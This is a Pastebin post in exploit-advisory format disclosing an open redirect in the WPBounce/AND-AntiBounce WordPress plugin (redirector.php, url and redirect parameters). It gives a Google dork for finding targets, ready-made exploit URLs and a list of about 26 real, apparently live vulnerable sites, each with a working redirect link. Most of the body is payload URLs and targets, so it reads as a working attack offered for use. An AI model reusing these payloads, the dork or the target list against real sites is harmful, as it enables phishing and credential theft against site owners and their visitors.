API tools faq
paste
Advertisement
KingSkrupellos

WordPress 5.1.1 WPBounce AND-AntiBounce 1.0.3 Open Redirect

KingSkrupellos
Mar 27th, 2019
766
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.55 KB | None | 0 0
raw download clone embed print report
  1. ################################################################################
  2.  
  3. # Exploit Title : WordPress 5.1.1 WPBounce AND-AntiBounce Plugins 1.0.3 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 27/03/2019
  7. # Vendor Homepage : devrix.com - wpbounce.com
  8. # Software Information Links :
  9. devrix.com/shop/product/wpbounce-anti-bounce-wordpress-plugin-2/
  10. codecanyon.net/item/wpbounce-anti-bounce-wordpress-plugin/12369000
  11. nulled.pro/wpbounce-anti-bounce-wordpress-plugin/
  12. wplocker.com/plugins/codecanyon/5907-wpbounce-anti-bounce-wordpress-plugin.html
  13. gfxdownload.com/wpbounce-anti-bounce-wordpress-plugin-free-download/
  14. affiliseo.de/anti-bounce/
  15. # Software Affected Version : Plugin Version 1.0.3 and higher
  16. WordPress Versions 4.x - 4.0.26 - 4.1.x - 4.1.26 - 4.3.19 - 4.2.23 -
  17. 4.3.19 - 4.7/4.8 - 4.8.2 - 4.9.x - 4.9.8 - 4.9.9 - 5.0.x - 5.0.4 - 5.1.1
  18. # Software Price : 20$
  19. # Tested On : Windows and Linux
  20. # Category : WebApps
  21. # Exploit Risk : High
  22. # Google Dorks : inurl:"/wp-content/plugins/AND-AntiBounce/"
  23. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  24. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  25. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  26. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  27. # Reference Link : cxsecurity.com/ascii/WLB-2019030226
  28.  
  29. ################################################################################
  30.  
  31. # Information About Software :
  32. ***************************
  33. WPBounce is a WordPress plugin that helps you minimizing the bounce rate of your landing pages, online shops
  34.  
  35. and other websites by displaying an offer when a potential customer is about to leave your website.
  36.  
  37. ################################################################################
  38.  
  39. # Impact :
  40. ***********
  41. WordPress 4.x.x/5.x.x AND-AntiBounce Plugins 1.0.3 and other versions accepts a user-controlled input
  42.  
  43. that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
  44.  
  45. An http parameter may contain a URL value and could cause the web application to redirect the
  46.  
  47. request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully
  48.  
  49. launch a phishing scam and steal user credentials. Because the server name in the modified link is identical
  50.  
  51. to the original site, phishing attempts have a more trustworthy appearance. Open redirect is a failure in that
  52.  
  53. process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in
  54.  
  55. phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection
  56.  
  57. when they visit the Web site of a company whose name has been changed or which has been acquired
  58.  
  59. by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is
  60.  
  61. to deceive the valid actor and steal his personal data.
  62.  
  63. ################################################################################
  64.  
  65. # Vulnerable File :
  66. ****************
  67. /redirector.php
  68.  
  69. # Vulnerable Parameter :
  70. **********************
  71. ?url=
  72.  
  73. &redirect=
  74.  
  75. ?url=[......]&redirect=
  76.  
  77. # Open Redirection Exploit :
  78. **************************
  79. /wp-content/plugins/AND-AntiBounce/redirector.php?url=https://www.[REDIRECTION-ADDRESS].gov
  80.  
  81. /wp-content/plugins/AND-AntiBounce/redirector.php?url=https://www.[REDIRECTION-ADDRESS].gov&redirect=https://www.[REDIRECTION-ADDRESS].gov
  82.  
  83. ################################################################################
  84.  
  85. # Example Vulnerable Sites :
  86. *************************
  87. [+] instrumentosdelaboratorio.org/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  88.  
  89. [+] mikrowelletest24.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  90.  
  91. [+] sucheerotikabenteuer.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  92.  
  93. [+] kohle-zahnpasta.eu/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  94.  
  95. [+] zapatillas-running.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  96.  
  97. [+] iniciosesionentrar.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  98.  
  99. [+] fitnessygimnasio.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  100.  
  101. [+] ab18-erotik.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  102.  
  103. [+] sexkontakte-privat.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  104.  
  105. [+] ficken-macht-spass.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  106.  
  107. [+] sexpartner-finden.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  108.  
  109. [+] fickfrauen.org/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  110.  
  111. [+] motsimabuse-dietanzschule.de/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  112.  
  113. [+] privatsextreffen.org/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  114.  
  115. [+] reife-hausfrauen.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  116.  
  117. [+] sextreffheute.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  118.  
  119. [+] dominasuche.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  120.  
  121. [+] frauenkontakte.biz/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  122.  
  123. [+] comobajarpesohoy.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  124.  
  125. [+] privatefickdates.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  126.  
  127. [+] erosucher.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  128.  
  129. [+] canal-moto.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  130.  
  131. [+] buscarparejainternet.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  132.  
  133. [+] kontakte-sex.net/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  134.  
  135. [+] golesmagicos.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  136.  
  137. [+] sofort-fremdgehen.com/wp-content/plugins/AND-AntiBounce/redirector.php?url=https://cxsecurity.com/
  138.  
  139. ################################################################################
  140.  
  141. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  142.  
  143. ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!